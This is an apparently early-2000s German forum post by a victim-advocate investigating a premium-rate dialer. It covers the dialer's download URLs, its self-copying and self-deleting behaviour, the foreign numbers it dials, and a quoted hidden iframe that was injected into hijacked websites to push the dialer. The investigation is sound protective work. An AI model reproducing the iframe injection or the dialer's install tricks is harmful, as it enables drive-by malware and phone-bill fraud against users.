Dialertechnik
Liebe Life & Art Geschaedigten,
inzwischen sind meine Nachforschungen von etwas Erfolg gekroent worden. Allerdings liefert der Downloadlink des Dialers, der heute morgen noch auf den Dialer weiterleitete, derzeit nur eine leere Seite. Ob die Verantwortlichen hellhoerig geworden sind, nachdem sie ihre Log Dateien gesichtet haben?
Herkunft des Dialers
Der eigentliche Dialer stammt von einem Webserver, der unter etlichen alias Namen sowie mit mindestens zwei verschiedene IP Adressen betrieben wird (Load Balancing?) Dem Servernamen bin ich durch einen Hinweis im Forum von Teltarif in
diesem Posting auf die Spur gekommen. Vorsicht, der dort gepostete Link ist scharf. Suche bei Google zeigt interessante Hits zu dieser Site. Die Datei enthaelt ein
Visual Basic Script, in dem der Dialer codiert ist.
Typen und Funktionsweise
http://$DOWNLOAD/download/dialer/dialers/d_1.exe.php?AID=XXX
http://$DOWNLOAD/download/dialer/dialers/d_2.exe.php?AID=XXX
http://$DOWNLOAD/download/dialer/dialers/d1.exe.php?AID=XXX
http://$DOWNLOAD/download/dialer/dialers/d2.exe.php?AID=XXX
Ich bin mir nicht sicher, welcher welcher ist, aber entpackt man den darin kodierten Dialer, gibts als einzige grafische Einwahlaufforderung den angehaengten Hinweis von 0900Warner. Nicht nett. Das duerfte selbst der RegTP nicht als Einwahldialog reichen. Gemein ist auch, dass ein Teil der Dialer dabei eine Weile (etwa 1-2 Minuten) warten. Keiner der Dialer ist bei der RegTP zugelassen.
Die Dialer erstellen dabei uebrigens interessanterweise eine Kopie von sich selbst unter C:\winnt\system32\shellext\w.exe, und fuehren diese mit Kommandozeilenparametern "-aid -inst" aus. Gleichzeitig gibt es eine del.bat, die beide Dateien und sich selbst loescht.
Dieses Script wird uebrigens erst nach Abfrage der Anbindung (Lan oder Modem) und des Browsers (Internet Exploerer Version >=4) ausgefuehrt, andernfalls landet man auf einer blanken HTML Seite. Die Odyssee beginnt dabei mit der URL
http://$DOWNLOAD/download/download.php?id=$NR&AID=$XXX
Allerdings endet gerade diese Kaskade derzeit immer auf einer leeren Seite, wo gestern/heute morgen nur die LAN Verbindungen landeten, da hat jemand an den Skripts gewurschtelt.
Als Variante des Dialers gibt es noch zwei Alternativen, die per Plugin "eu_cax.cab" geladen werden. Dieses ist im Wesentlichen ein Internet Explorer Plugin, welches eine Datei von einer URL herunterlaedt und ausfuehrt. Diese Dialer sind ein Byte kuerzer als die vorigen Varianten, aber funktionieren beinahe genauso. Unterschiede ist der Name der Datei in ShellExt, der in diesem Fall d.exe heisst (Mensch, sind die einfallslos, wie soll man den von
HFMs Dialer unterscheiden koennen).
Dabei besteht eher Aehnlichkeit zu dem
ExDialer.
Einziger Unterschied: Die Nummer hat sich mal wieder geaendert. Und zwar per 006905051 ins wunderschoene
Atafu Atoll, Tokelau. Ich denke mal, ET will nach Hause Telefonieren. Weniger weit weg, und vermutlich weniger lukrativ ist der zweite Anruf, der geht nach Estland, 0037270220140.
Einsatz
Ok, nun ist klar, was der Dialer macht, aber wo wird der Dialer eingesetzt? Und dies ist meines Erachtens ein Novum an Dreistigkeit. Bin beim Suchen nach der Download URL ueber einen
Thread in einem Schweizer Webmasterforum gestolpert. Per Exploit wird ein Webserver gehijackt, und in die index.html Seiten ein iframe eingebaut
Code:
<IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH="1" HEIGHT="1"></IFRAME>
Der entsprechende Server ist derzeit scheinbar nicht mehr am Netz, aber der Link leitete wohl einstmals direkt auf die oben genannte Download URL. Suche nach dem String "forced-action.com" bei Google liefet immerhin
117 Hits. Scheinbar wird insbesondere ein Exploit in
PHPNuke missbraucht.
Nun ja, erst einmal genug fuer heute,
Gruesse,
TSCoreNinja
PS: alle hier gemachten Aussagen koennen gerne gegenueber den Geld eintreibenden Institutionen zitiert werden. Weitere Details koennen per PN angefragt werden. Ansonsten werde ich das Ganze mal ordentlich dokumentiert der RegTP zutragen.
[edit 22:37] Link zum Schweizer Forum berichtigt[/edit]
